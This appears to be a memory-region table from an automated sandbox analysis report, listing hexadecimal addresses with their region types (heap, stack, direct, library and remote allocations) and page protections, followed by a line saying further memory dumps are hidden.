54BC000
unkown
page execute read
2B81000
heap
page read and write
269AF89D000
heap
page read and write
2E20000
heap
page read and write
2E90000
heap
page read and write
B13000
unkown
page read and write
269AF730000
heap
page read and write
604000
heap
page read and write
130F9000
heap
page read and write
269AEC8C000
heap
page read and write
269B0EBE000
heap
page read and write
B1C7000
trusted library allocation
page read and write
2EDC000
heap
page read and write
E48000
heap
page read and write
92DC000
unkown
page readonly
269AFFF6000
heap
page read and write
269AF8A7000
heap
page read and write
B1B0000
trusted library allocation
page read and write
940F000
unkown
page readonly
269B0A5C000
heap
page read and write
2B81000
heap
page read and write
3340000
heap
page read and write
5B3000
heap
page read and write
A0D7000
direct allocation
page read and write
B1C7000
trusted library allocation
page read and write
1F5A49E0000
heap
page read and write
2C30000
heap
page read and write
2A44000
heap
page read and write
E3A000
heap
page read and write
2B81000
heap
page read and write
269AF6EE000
heap
page read and write
A259000
direct allocation
page read and write
231588A0000
heap
page read and write
269AF8CC000
heap
page read and write
269AED01000
heap
page read and write
76ED000
unkown
page execute read
269AC591000
heap
page read and write
3254000
heap
page read and write
93B6000
unkown
page readonly
2B81000
heap
page read and write
A3AD000
direct allocation
page read and write
269AFE6A000
heap
page read and write
1F5A4975000
heap
page read and write
2B81000
heap
page read and write
9E95000
unkown
page readonly
269AF8CF000
heap
page read and write
B1D9000
trusted library allocation
page read and write
2CA0000
heap
page read and write
269B0B23000
heap
page read and write
269B1110000
heap
page read and write
3030000
heap
page read and write
2CF0000
heap
page read and write
5B0000
heap
page read and write
2BB65EE5000
heap
page read and write
269AF8CA000
heap
page read and write
269AF838000
heap
page read and write
A06E000
direct allocation
page read and write
2BB65E66000
heap
page read and write
4FD000
stack
page read and write
269B12DE000
heap
page read and write
231588E9000
heap
page read and write
269AF8CC000
heap
page read and write
A468000
direct allocation
page read and write
2AAD000
direct allocation
page read and write
9300000
unkown
page readonly
2B81000
heap
page read and write
2BB65E89000
heap
page read and write
2B81000
heap
page read and write
2B25000
heap
page read and write
2BB65ECC000
heap
page read and write
269AF8CA000
heap
page read and write
A555000
direct allocation
page read and write
2B81000
heap
page read and write
ACE7000
stack
page read and write
8F3D000
unkown
page read and write
269B1443000
heap
page read and write
AFA5000
direct allocation
page read and write
269AF8C7000
heap
page read and write
603000
heap
page read and write
2A5D000
direct allocation
page read and write
93E1000
unkown
page readonly
269B0038000
heap
page read and write
B4CE000
direct allocation
page read and write
F34000
heap
page read and write
D9971FF000
stack
page read and write
9014000
unkown
page read and write
269A9697000
heap
page read and write
2B81000
heap
page read and write
2B81000
heap
page read and write
A268000
direct allocation
page read and write
269B1008000
heap
page read and write
2A91000
direct allocation
page read and write
269AF8B0000
heap
page read and write
6F879000
unkown
page read and write
2B81000
heap
page read and write
A10D000
direct allocation
page read and write
6F851000
unkown
page execute read
2BA0000
heap
page read and write
1F5A4970000
heap
page read and write
3254000
heap
page read and write
B023000
direct allocation
page read and write
269AF6AC000
heap
page read and write
269B13A4000
heap
page read and write
269AF8B0000
heap
page read and write
3253000
heap
page read and write
3590000
heap
page read and write
2B81000
heap
page read and write
29AD000
stack
page read and write
269AF8D9000
heap
page read and write
1F5A49E0000
heap
page read and write
2B81000
heap
page read and write
2A49000
heap
page read and write
2F60000
heap
page read and write
269B0FC6000
heap
page read and write
2B81000
heap
page read and write
5A0000
heap
page read and write
23158989000
heap
page read and write
269AF894000
heap
page read and write
23158916000
heap
page read and write
2BB65EE5000
heap
page read and write
269A9667000
heap
page read and write
269A9CEE000
heap
page read and write
269B09D8000
heap
page read and write
2B81000
heap
page read and write
2BB65E10000
heap
page read and write
3140000
heap
page read and write
55D000
stack
page read and write
92E5000
unkown
page readonly
618C000
unkown
page execute read
2B81000
heap
page read and write
D577000
heap
page read and write
269B0182000
heap
page read and write
2B81000
heap
page read and write
2A48000
direct allocation
page read and write
2D03000
heap
page read and write
269AF051000
heap
page read and write
269B007A000
heap
page read and write
269AEBC6000
heap
page read and write
A3E8000
direct allocation
page read and write
E77000
heap
page read and write
269AFC18000
heap
page read and write
650D000
unkown
page execute read
269B1008000
heap
page read and write
2315C2D0000
trusted library allocation
page read and write
2B81000
heap
page read and write
6F875000
unkown
page readonly
2CF6000
heap
page read and write
269AF8AA000
heap
page read and write
B31000
unkown
page readonly
5A4000
heap
page read and write
29B7000
direct allocation
page read and write
269AEE8C000
heap
page read and write
6E4B000
unkown
page execute read
E70000
heap
page read and write
32FF000
stack
page read and write
269AF05A000
heap
page read and write
269B0F00000
heap
page read and write
269AF629000
heap
page read and write
269A96D9000
heap
page read and write
269B03D4000
heap
page read and write
2BCF000
stack
page read and write
2B81000
heap
page read and write
B1CA000
trusted library allocation
page read and write
269AF8CF000
heap
page read and write
2BB65E9E000
heap
page read and write
269B0BE8000
heap
page read and write
2315891D000
heap
page read and write
2A14000
direct allocation
page read and write
B1B0000
trusted library allocation
page read and write
23158982000
heap
page read and write
E5D000
heap
page read and write
2FB0000
heap
page read and write
2AED000
stack
page read and write
269AFB10000
heap
page read and write
ADEA000
stack
page read and write
130E7000
heap
page read and write
269B1218000
heap
page read and write
269AF772000
heap
page read and write
269B0996000
heap
page read and write
2F7E000
unkown
page read and write
2CA2000
heap
page read and write
2B81000
heap
page read and write
3090000
heap
page read and write
269AF184000
heap
page read and write
269AF7F6000
heap
page read and write
269B125B000
heap
page read and write
2E2E000
stack
page read and write
9405000
unkown
page readonly
2315C160000
heap
page read and write
269AF8B5000
heap
page read and write
2D04000
heap
page read and write
269A96D9000
heap
page read and write
1F5A6750000
heap
page read and write
2D64000
heap
page read and write
269AF8B0000
heap
page read and write
1F5A4910000
heap
page read and write
3120000
heap
page read and write
2E54000
heap
page read and write
269A965A000
heap
page read and write
2B81000
heap
page read and write
AF8000
unkown
page read and write
2DCD000
stack
page read and write
2B54000
heap
page read and write
2C4F000
unkown
page read and write
603000
heap
page read and write
2CFD000
stack
page read and write
2B81000
heap
page read and write
2B81000
heap
page read and write
2B81000
heap
page read and write
2B81000
heap
page read and write
2B81000
heap
page read and write
2FDE000
stack
page read and write
9382000
unkown
page readonly
269A9664000
heap
page read and write
29C4000
direct allocation
page read and write
269AF839000
heap
page read and write
23158C60000
heap
page read and write
269B0CAE000
heap
page read and write
B230000
heap
page read and write
2B81000
heap
page read and write
2B81000
heap
page read and write
2A3D000
stack
page read and write
35DE000
stack
page read and write
8F52000
unkown
page write copy
414000
unkown
page execute read
D509000
heap
page read and write
C70FFFE000
stack
page read and write
269AF8AF000
heap
page read and write
EDE000
heap
page read and write
8F3F000
unkown
page read and write
269AF8C9000
heap
page read and write
269AF89D000
heap
page read and write
269AEF52000
heap
page read and write
A6BE000
stack
page read and write
B42D000
trusted library allocation
page read and write
2BE0000
heap
page read and write
DDE000
stack
page read and write
ABC000
unkown
page read and write
269AFACE000
heap
page read and write
2CF0000
heap
page read and write
2B81000
heap
page read and write
A700000
heap
page read and write
269AEC4A000
heap
page read and write
2B81000
heap
page read and write
D95C000
stack
page read and write
9062000
unkown
page read and write
23158932000
heap
page read and write
2F1F000
stack
page read and write
2FC0000
heap
page read and write
23158934000
heap
page read and write
269B1152000
heap
page read and write
9347000
unkown
page readonly
23158909000
heap
page read and write
3120000
heap
page read and write
2FE6000
heap
page read and write
D551000
heap
page read and write
269B0954000
heap
page read and write
269B0B64000
heap
page read and write
C7109FE000
stack
page read and write
269AFF72000
heap
page read and write
269B030E000
heap
page read and write
2C8E000
stack
page read and write
2F09000
heap
page read and write
269AF45A000
heap
page read and write
B1D9000
trusted library allocation
page read and write
B1D9000
trusted library allocation
page read and write
23158C65000
heap
page read and write
2A0D000
direct allocation
page read and write
2B81000
heap
page read and write
2B81000
heap
page read and write
9054000
unkown
page read and write
2E50000
heap
page read and write
269B04DC000
heap
page read and write
269AF89D000
heap
page read and write
2E54000
heap
page read and write
2CA0000
heap
page read and write
269B1218000
heap
page read and write
2B81000
heap
page read and write
2B81000
heap
page read and write
2ABC000
direct allocation
page read and write
750000
heap
page read and write
269A9670000
heap
page read and write
269B1497000
heap
page read and write
2A43000
heap
page read and write
269B129C000
heap
page read and write
2A7D000
stack
page read and write
269B0D74000
heap
page read and write
2B81000
heap
page read and write
269B072E000
heap
page read and write
269B0F42000
heap
page read and write
2F9F000
unkown
page read and write
269AEECE000
heap
page read and write
2B81000
heap
page read and write
770000
heap
page read and write
E84000
heap
page read and write
93A5000
unkown
page readonly
E0E000
heap
page read and write
50D000
stack
page read and write
934B000
unkown
page readonly
93DD000
unkown
page readonly
543E000
stack
page read and write
30C3000
heap
page read and write
93CC000
unkown
page readonly
930F000
unkown
page readonly
32B0000
heap
page read and write
603000
heap
page read and write
2D5E000
stack
page read and write
2B81000
heap
page read and write
1F5A4A02000
heap
page read and write
269AEE00000
heap
page read and write
269AF8B3000
heap
page read and write
ACF000
unkown
page read and write
F34000
heap
page read and write
5BA000
heap
page read and write
269AF8D4000
heap
page read and write
269AF310000
heap
page read and write
2B81000
heap
page read and write
5460000
direct allocation
page execute and read and write
D52C000
heap
page read and write
2CA4000
heap
page read and write
906E000
unkown
page readonly
2D63000
heap
page read and write
2B81000
heap
page read and write
269AF8A1000
heap
page read and write
2B81000
heap
page read and write
2B81000
heap
page read and write
54A3000
unkown
page execute read
36DF000
stack
page read and write
30CA000
heap
page read and write
269B129C000
heap
page read and write
2B7C000
stack
page read and write
3579000
heap
page read and write
3100000
heap
page read and write
2BA0000
heap
page read and write
4AC000
unkown
page execute read
269A96D9000
heap
page read and write
2AFC000
stack
page read and write
269AF101000
heap
page read and write
269B0CF0000
heap
page read and write
2B81000
heap
page read and write
42C000
unkown
page execute read
23158870000
heap
page read and write
3150000
heap
page read and write
269AEC08000
heap
page read and write
2315A8D0000
heap
page read and write
269AF8B5000
heap
page read and write
2B53000
heap
page read and write
2ECE000
stack
page read and write
2C90000
heap
page read and write
269B0912000
heap
page read and write
75D000
stack
page read and write
383F000
stack
page read and write
2A74000
direct allocation
page read and write
2B81000
heap
page read and write
269A96D9000
heap
page read and write
2980000
heap
page read and write
1F5A49FB000
heap
page read and write
269AFC9D000
heap
page read and write
2B81000
heap
page read and write
2B81000
heap
page read and write
2B81000
heap
page read and write
560000
heap
page read and write
2BB66020000
heap
page read and write
2DB0000
heap
page read and write
318F000
stack
page read and write
2AC0000
heap
page read and write
1F5A49E0000
heap
page read and write
2B81000
heap
page read and write
269B0AE0000
heap
page read and write
2B81000
heap
page read and write
30B0000
heap
page read and write
92D4000
unkown
page readonly
269B028A000
heap
page read and write
2B81000
heap
page read and write
301F000
stack
page read and write
9433000
unkown
page readonly
A300000
direct allocation
page read and write
269A9658000
heap
page read and write
604000
heap
page read and write
2E6F000
unkown
page read and write
269AF8B8000
heap
page read and write
A290000
direct allocation
page read and write
2B81000
heap
page read and write
903F000
unkown
page read and write
2B81000
heap
page read and write
F34000
heap
page read and write
269B0B64000
heap
page read and write
269A965D000
heap
page read and write
23158989000
heap
page read and write
8F99000
unkown
page read and write
269A96D9000
heap
page read and write
110E000
stack
page read and write
23158990000
heap
page read and write
2B81000
heap
page read and write
E72000
heap
page read and write
269A9656000
heap
page read and write
A39E000
direct allocation
page read and write
9F22000
unkown
page readonly
2B81000
heap
page read and write
113AD000
stack
page read and write
2DCC000
stack
page read and write
5F0000
heap
page read and write
2B81000
heap
page read and write
2B4E000
unkown
page read and write
2BB65ECC000
heap
page read and write
905F000
unkown
page read and write
3370000
heap
page read and write
6AE5000
unkown
page execute read
2B81000
heap
page read and write
269B051E000
heap
page read and write
1F5A48F0000
heap
page read and write
2F04000
heap
page read and write
269AEB42000
heap
page read and write
93CE000
unkown
page readonly
D4E5000
heap
page read and write
8F42000
unkown
page write copy
2E53000
heap
page read and write
2BB65E89000
heap
page read and write
2BB65E8A000
heap
page read and write
8F12000
unkown
page execute read
D59E000
heap
page read and write
93D3000
unkown
page readonly
55E000
unkown
page read and write
3566000
heap
page read and write
269B125A000
heap
page read and write
580000
heap
page read and write
2A06000
direct allocation
page read and write
2315892F000
heap
page read and write
8F45000
unkown
page read and write
269AF8A5000
heap
page read and write
269AF7B4000
heap
page read and write
269AFE6A000
heap
page read and write
346E000
unkown
page read and write
269B007A000
heap
page read and write
23158915000
heap
page read and write
2A44000
heap
page read and write
7FBC000
unkown
page execute read
5450000
heap
page read and write
2A98000
direct allocation
page read and write
2C40000
heap
page read and write
269B0D32000
heap
page read and write
269B1194000
heap
page read and write
2BB65E6D000
heap
page read and write
335E000
unkown
page read and write
5B3000
heap
page read and write
8F50000
unkown
page read and write
269AEECE000
heap
page read and write
29AD000
stack
page read and write
B1D9000
trusted library allocation
page read and write
34AF000
stack
page read and write
3540000
heap
page read and write
1F5A49D1000
heap
page read and write
2B81000
heap
page read and write
2D03000
heap
page read and write
92A5000
unkown
page readonly
2E10000
heap
page read and write
B1B2000
trusted library allocation
page read and write
2B81000
heap
page read and write
A3DC000
direct allocation
page read and write
2BB65E50000
heap
page read and write
2B10000
heap
page read and write
A45E000
direct allocation
page read and write
2BB65E30000
remote allocation
page read and write
269AF89D000
heap
page read and write
2C90000
heap
page read and write
3260000
heap
page read and write
2B81000
heap
page read and write
2C70000
heap
page read and write
269AF8B8000
heap
page read and write
2C10000
heap
page read and write
8F8B000
unkown
page write copy
2A31000
direct allocation
page read and write
9312000
unkown
page readonly
D543000
heap
page read and write
2C5E000
unkown
page read and write
29E7000
direct allocation
page read and write
2B81000
heap
page read and write
269AF184000
heap
page read and write
2B81000
heap
page read and write
6A0000
heap
page read and write
269AFDA4000
heap
page read and write
9407000
unkown
page readonly
269B146C000
heap
page read and write
2B81000
heap
page read and write
2EF6000
heap
page read and write
2A6C000
direct allocation
page read and write
269AF310000
heap
page read and write
AFD000
unkown
page read and write
269B0E7C000
heap
page read and write
670000
heap
page read and write
2B81000
heap
page read and write
30B6000
heap
page read and write
269B0668000
heap
page read and write
A092000
direct allocation
page read and write
5EBC000
unkown
page execute read
2F03000
heap
page read and write
2FBF000
unkown
page read and write
269AF208000
heap
page read and write
E48000
heap
page read and write
269AFA4A000
heap
page read and write
2A43000
heap
page read and write
269B02CC000
heap
page read and write
269AFFF6000
heap
page read and write
29BF000
unkown
page read and write
D49F000
stack
page read and write
5C0000
heap
page read and write
ECF000
heap
page read and write
269AF2CE000
heap
page read and write
2CD0000
heap
page read and write
2B2C000
heap
page read and write
269AF8B5000
heap
page read and write
2D24000
heap
page read and write
269B0FC7000
heap
page read and write
2B81000
heap
page read and write
2B81000
heap
page read and write
2B81000
heap
page read and write
269B0F43000
heap
page read and write
269AF8C8000
heap
page read and write
D960000
remote allocation
page read and write
269AFA08000
heap
page read and write
3573000
heap
page read and write
A3D2000
direct allocation
page read and write
269B0E3B000
heap
page read and write
269B0F00000
heap
page read and write
2B81000
heap
page read and write
231588E0000
heap
page read and write
AB6000
unkown
page read and write
D5A0000
heap
page read and write
2B81000
heap
page read and write
269B1194000
heap
page read and write
269B0D33000
heap
page read and write
B1EE000
stack
page read and write
2AB5000
direct allocation
page read and write
D4B3000
heap
page read and write
269B00BC000
heap
page read and write
AB3000
unkown
page read and write
269AF8BE000
heap
page read and write
269B129C000
heap
page read and write
269B0BE8000
heap
page read and write
269AFC5A000
heap
page read and write
2E59000
heap
page read and write
B4CE000
direct allocation
page read and write
269A965D000
heap
page read and write
2CA0000
heap
page read and write
269B11D6000
heap
page read and write
2CFD000
stack
page read and write
C9A0000
trusted library allocation
page read and write
269AF8B8000
heap
page read and write
269A96D9000
heap
page read and write
269B0182000
heap
page read and write
DEA000
heap
page read and write
73DB000
unkown
page execute read
269AF8BA000
heap
page read and write
31B0000
heap
page read and write
2BB65EE5000
heap
page read and write
23158986000
heap
page read and write
269AF05A000
heap
page read and write
6F87F000
unkown
page read and write
23158910000
heap
page read and write
34CF000
stack
page read and write
269A99F1000
heap
page read and write
B1B6000
trusted library allocation
page read and write
400000
unkown
page readonly
2BED000
stack
page read and write
269AF8D4000
heap
page read and write
3200000
heap
page read and write
291D000
stack
page read and write
2B81000
heap
page read and write
34B0000
heap
page read and write
931F000
unkown
page readonly
269AF8CC000
heap
page read and write
2B53000
heap
page read and write
B16000
unkown
page read and write
8F88000
unkown
page read and write
2D63000
heap
page read and write
2B81000
heap
page read and write
E16000
heap
page read and write
269AF9C6000
heap
page read and write
269AF8C6000
heap
page read and write
928A000
unkown
page readonly
B1CA000
trusted library allocation
page read and write
2315894A000
heap
page read and write
269B104B000
heap
page read and write
269AF8CF000
heap
page read and write
269AF89D000
heap
page read and write
2CE0000
heap
page read and write
D53D000
heap
page read and write
2F03000
heap
page read and write
269B0392000
heap
page read and write
2BB65E58000
heap
page read and write
2E53000
heap
page read and write
A0C1000
direct allocation
page read and write
269B146F000
heap
page read and write
269AF8A0000
heap
page read and write
269AEE8C000
heap
page read and write
2B81000
heap
page read and write
2B81000
heap
page read and write
D9972FE000
stack
page read and write
269AFA8D000
heap
page read and write
B29000
unkown
page read and write
2D1F000
unkown
page read and write
D50000
heap
page read and write
942A000
unkown
page readonly
269AFE28000
heap
page read and write
269AF7F6000
heap
page read and write
2B53000
heap
page read and write
2A10000
heap
page read and write
2315898D000
heap
page read and write
3130000
heap
page read and write
2315A404000
heap
page read and write
D534000
heap
page read and write
2D24000
heap
page read and write
269B0206000
heap
page read and write
A075000
direct allocation
page read and write
269B0F84000
heap
page read and write
269B0458000
heap
page read and write
269B0E3A000
heap
page read and write
657A000
unkown
page execute read
1F5A6310000
heap
page read and write
2BB65E95000
heap
page read and write
EC3000
heap
page read and write
2C60000
heap
page read and write
269AF984000
heap
page read and write
269AFDE6000
heap
page read and write
2A44000
heap
page read and write
269B05E4000
heap
page read and write
32B0000
heap
page read and write
A2AE000
direct allocation
page read and write
306F000
unkown
page read and write
2B81000
heap
page read and write
ADF000
unkown
page write copy
9064000
unkown
page write copy
2FF4000
heap
page read and write
2A65000
direct allocation
page read and write
269B1320000
heap
page read and write
D960000
remote allocation
page read and write
936C000
unkown
page readonly
C7100FE000
stack
page read and write
C8EE000
stack
page read and write
2B81000
heap
page read and write
2E60000
heap
page read and write
269AF8CA000
heap
page read and write
5B4000
heap
page read and write
2B81000
heap
page read and write
C7105FD000
stack
page read and write
269B143F000
heap
page read and write
269B1110000
heap
page read and write
604000
heap
page read and write
2B81000
heap
page read and write
269B1428000
heap
page read and write
269AF8C5000
heap
page read and write
30C0000
heap
page read and write
2A2A000
direct allocation
page read and write
269B0C2A000
heap
page read and write
269AF942000
heap
page read and write
269AF562000
heap
page read and write
269AF8A3000
heap
page read and write
2BB65EE6000
heap
page read and write
23158931000
heap
page read and write
2F03000
heap
page read and write
269B108C000
heap
page read and write
1F5A49E6000
heap
page read and write
18C000
stack
page read and write
23158997000
heap
page read and write
2B70000
heap
page read and write
2B81000
heap
page read and write
2B81000
heap
page read and write
2B81000
heap
page read and write
5DC000
heap
page read and write
269AF901000
heap
page read and write
930C000
unkown
page readonly
269AF66A000
heap
page read and write
2B40000
heap
page read and write
269AEDFF000
heap
page read and write
269AF208000
heap
page read and write
269AFF30000
heap
page read and write
269AFC5A000
heap
page read and write
A0DE000
direct allocation
page read and write
B4CE000
direct allocation
page read and write
269A965A000
heap
page read and write
2D04000
heap
page read and write
31AF000
stack
page read and write
780000
heap
page read and write
269B0A1A000
heap
page read and write
2B6E000
stack
page read and write
2FB0000
heap
page read and write
93F7000
unkown
page readonly
2B80000
heap
page read and write
2B81000
heap
page read and write
2B81000
heap
page read and write
269A9AF0000
heap
page read and write
B1CA000
trusted library allocation
page read and write
2B81000
heap
page read and write
2FF3000
heap
page read and write
269AF8BE000
heap
page read and write
A11B000
direct allocation
page read and write
A4EB000
direct allocation
page read and write
9427000
unkown
page readonly
2CA2000
heap
page read and write
269A9635000
heap
page read and write
269AF1C7000
heap
page read and write
269AF09C000
heap
page read and write
269AF8C6000
heap
page read and write
269AF8A7000
heap
page read and write
269AF8D4000
heap
page read and write
C7103FE000
stack
page read and write
2A39000
direct allocation
page read and write
269AEF11000
heap
page read and write
EC6000
heap
page read and write
2F60000
heap
page read and write
744B000
unkown
page execute read
269A9FEF000
heap
page read and write
1F5A49B0000
heap
page read and write
9391000
unkown
page readonly
269AF894000
heap
page read and write
2B0E000
unkown
page read and write
906C000
unkown
page read and write
58C000
heap
page read and write
8F69000
unkown
page read and write
335F000
unkown
page read and write
2A43000
heap
page read and write
B434000
direct allocation
page read and write
269AF8B0000
heap
page read and write
D58C000
heap
page read and write
2E40000
heap
page read and write
2B81000
heap
page read and write
2BB65E71000
heap
page read and write
269AED84000
heap
page read and write
2B81000
heap
page read and write
A114000
direct allocation
page read and write
2BB65E40000
heap
page read and write
269AF8B5000
heap
page read and write
E7D000
heap
page read and write
269AF8B8000
heap
page read and write
269AF09C000
heap
page read and write
2B81000
heap
page read and write
3110000
heap
page read and write
2E50000
heap
page read and write
269B0626000
heap
page read and write
B1B0000
trusted library allocation
page read and write
E87000
heap
page read and write
32FC000
stack
page read and write
269AEF94000
heap
page read and write
2DEF000
unkown
page read and write
269AEF10000
heap
page read and write
B430000
direct allocation
page read and write
2B81000
heap
page read and write
92D6000
unkown
page readonly
2BB65E95000
heap
page read and write
269AF49C000
heap
page read and write
5B3000
heap
page read and write
E16000
heap
page read and write
2B81000
heap
page read and write
269AF562000
heap
page read and write
269B0248000
heap
page read and write
269AF89F000
heap
page read and write
269B0668000
heap
page read and write
2FF3000
heap
page read and write
3150000
heap
page read and write
269B0DF8000
heap
page read and write
1CBF7FF000
stack
page read and write
269AF8D7000
heap
page read and write
2D23000
heap
page read and write
269B07B2000
heap
page read and write
269B13A4000
heap
page read and write
1F5A4810000
heap
page read and write
2B81000
heap
page read and write
2D23000
heap
page read and write
9322000
unkown
page readonly
9376000
unkown
page readonly
3510000
heap
page read and write
2B81000
heap
page read and write
269B007A000
heap
page read and write
3040000
heap
page read and write
1F5A49EB000
heap
page read and write
269B0F84000
heap
page read and write
B1C000
unkown
page read and write
1F5A49ED000
heap
page read and write
269B0770000
heap
page read and write
2D3E000
stack
page read and write
C7107FE000
stack
page read and write
B4CC000
direct allocation
page read and write
8F76000
unkown
page read and write
92CF000
unkown
page readonly
1F5A49FC000
heap
page read and write
D4CB000
heap
page read and write
269AF8CA000
heap
page read and write
2B81000
heap
page read and write
269AFCDE000
heap
page read and write
2C8E000
stack
page read and write
269AF1C6000
heap
page read and write
269B0A5C000
heap
page read and write
2B81000
heap
page read and write
269B0A9E000
heap
page read and write
269B1480000
heap
page read and write
269A9698000
heap
page read and write
2B81000
heap
page read and write
269AF8CC000
heap
page read and write
269B11D7000
heap
page read and write
2EF0000
heap
page read and write
2B81000
heap
page read and write
92C8000
unkown
page readonly
A4D5000
direct allocation
page read and write
92EB000
unkown
page readonly
2BB65EB3000
heap
page read and write
2B81000
heap
page read and write
C7108FB000
stack
page read and write
269A96D9000
heap
page read and write
269A9664000
heap
page read and write
2B81000
heap
page read and write
8F87000
unkown
page write copy
D4BD000
heap
page read and write
3574000
heap
page read and write
269AF8B8000
heap
page read and write
269B1485000
heap
page read and write
3253000
heap
page read and write
2B81000
heap
page read and write
5FD000
stack
page read and write
D51A000
heap
page read and write
A5BC000
stack
page read and write
6D0000
heap
page read and write
2CA4000
heap
page read and write
269A966B000
heap
page read and write
269AFF72000
heap
page read and write
2E53000
heap
page read and write
8F83000
unkown
page read and write
92C5000
unkown
page readonly
A08A000
direct allocation
page read and write
2BB65E00000
heap
page read and write
B1B6000
trusted library allocation
page read and write
6C96000
unkown
page execute read
760000
heap
page read and write
269AEECE000
heap
page read and write
2B81000
heap
page read and write
269B1428000
heap
page read and write
309C000
heap
page read and write
41C000
unkown
page execute read
E83000
heap
page read and write
D5A3000
heap
page read and write
A17A000
direct allocation
page read and write
B1D9000
trusted library allocation
page read and write
23158880000
heap
page read and write
7816000
unkown
page execute read
5B3000
heap
page read and write
9316000
unkown
page readonly
2D23000
heap
page read and write
935D000
unkown
page readonly
2B80000
heap
page read and write
269AF8D5000
heap
page read and write
2B81000
heap
page read and write
9285000
unkown
page readonly
269AF87A000
heap
page read and write
3370000
heap
page read and write
2F60000
heap
page read and write
269A965D000
heap
page read and write
F30000
heap
page read and write
269B1363000
heap
page read and write
269A966C000
heap
page read and write
269A96D9000
heap
page read and write
269AFD62000
heap
page read and write
2B81000
heap
page read and write
9070000
unkown
page readonly
D91C000
stack
page read and write
93E8000
unkown
page readonly
A52B000
direct allocation
page read and write
269AF8D8000
heap
page read and write
9308000
unkown
page readonly
B1C7000
trusted library allocation
page read and write
269AF8CA000
heap
page read and write
269AF018000
heap
page read and write
2D64000
heap
page read and write
A0F6000
direct allocation
page read and write
2B81000
heap
page read and write
8F4C000
unkown
page write copy
2B81000
heap
page read and write
269AF8A4000
heap
page read and write
2B81000
heap
page read and write
269AF8D5000
heap
page read and write
3110000
heap
page read and write
30C4000
heap
page read and write
A465000
direct allocation
page read and write
269AF8B4000
heap
page read and write
269B1320000
heap
page read and write
935A000
unkown
page readonly
D56C000
heap
page read and write
2A56000
direct allocation
page read and write
269AF8CA000
heap
page read and write
70E000
unkown
page read and write
269AF8C5000
heap
page read and write
2BB65EA3000
heap
page read and write
269B0C2B000
heap
page read and write
401000
unkown
page execute read
8F3E000
unkown
page write copy
9023000
unkown
page read and write
269B1485000
heap
page read and write
3510000
heap
page read and write
68E7000
unkown
page execute read
E71000
heap
page read and write
AF80000
direct allocation
page read and write
269AF8B8000
heap
page read and write
3240000
heap
page read and write
269AF394000
heap
page read and write
269B0458000
heap
page read and write
8F43000
unkown
page read and write
2B81000
heap
page read and write
2B81000
heap
page read and write
54BB000
unkown
page execute and read and write
939D000
unkown
page readonly
D39D000
stack
page read and write
1F5A4A05000
heap
page read and write
2315A8D5000
heap
page read and write
54A2000
unkown
page execute and read and write
269B01C5000
heap
page read and write
F34000
heap
page read and write
B1C7000
trusted library allocation
page read and write
B1C7000
trusted library allocation
page read and write
There are 1520 hidden memdumps, click here to show them.